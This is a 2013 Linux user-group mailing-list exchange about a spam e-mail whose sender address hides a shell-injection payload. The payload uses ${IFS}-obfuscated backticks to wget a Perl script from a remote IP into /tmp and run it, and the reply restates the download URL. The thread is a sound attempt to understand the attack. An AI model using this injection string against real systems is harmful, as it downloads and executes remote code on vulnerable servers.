[GLLUG] Can anyone tell me what this is trying to do?
Martin A. Brooks
martin at hinterlands.org
Mon Nov 4 16:34:52 UTC 2013
On Mon, November 4, 2013 16:26, John Winters wrote:
> Amongst the junk e-mails which I receive, I get the odd one with a really
> weird sender name. Like this:
>
> I've split it over several lines at silly places. I presume it is
> harmless in the body of an e-mail, but just to be safe.
>
>
> x`wg
> et${IFS}-O${IFS}/tm
> p/p.pl${IFS}117.239
> .156.162/user.pl``perl${IFS}/t
> mp/p.pl`@bla
> at.com <x`wget${IFS}-O${I
> FS}/tmp/p.pl${IFS}117.23
> 9.156.162/user.pl``p
> erl${IFS}/tmp/p.pl`@blaat.com>
>
> I've been googling, but can't discover what this is trying to do. Is it a
> current vulnerability in any common MTA?
wget http://117.239.156.162/user.pl
More information about the GLLUG
mailing list